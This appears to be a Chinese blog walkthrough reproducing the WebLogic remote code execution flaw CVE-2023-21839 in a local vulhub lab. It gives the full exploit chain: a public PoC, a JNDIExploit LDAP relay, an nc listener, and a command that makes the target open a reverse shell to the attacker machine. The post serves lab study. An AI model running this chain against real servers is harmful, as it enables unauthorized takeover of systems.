Weblogic未授权远程代码执行漏洞 (CVE-2023-21839) vulhub复现

Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)

Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0 和 14.1.1.0.0存在安全漏洞,攻击者可利用该漏洞导致对关键数据的未授权访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。

漏洞复现:

靶机ubuntu:192.168.126.128

攻击机kali:192.168.126.130

cd vulhub-master/

cd weblogic/

cd CVE-2023-21839/

docker-compose build #重新编译靶场环境 docker-compose up -d #开启靶场 docker-compose down #关闭靶场

启动成功后访问http://your-ip:7001/console可以看到管理界面

在这里插入图片描述

账号密码可通过docker-compose logs | grep password查看
在这里插入图片描述

攻击环境搭建

打开攻击机kali:192.168.126.130

下载poc:git clone https://github.com/4ra1n/CVE-2023-21839

在这里插入图片描述

没有安装go,先安装go:sudo apt install gccgo-go

安装后进行编译go build -o CVE-2023-21839

编译后:

在这里插入图片描述

中转工具

JNDIExploit下载:

https://github.com/WhiteHSBG/JNDIExploit/releases/tag/v1.4

1.开启JNDIExpolit监听:java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.126.130

在这里插入图片描述

2.开启nc监听: nc -lvvp 1234
在这里插入图片描述

3.攻击payload:

./CVE-2023-21839 -ip 192.168.126.128 -port 7001 -ldap ldap://192.168.126.130:1389/Basic/ReverseShell/192.168.126.130/1234

发起攻击
在这里插入图片描述

nc成功获得shell

在这里插入图片描述

成功创建hacker文件

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值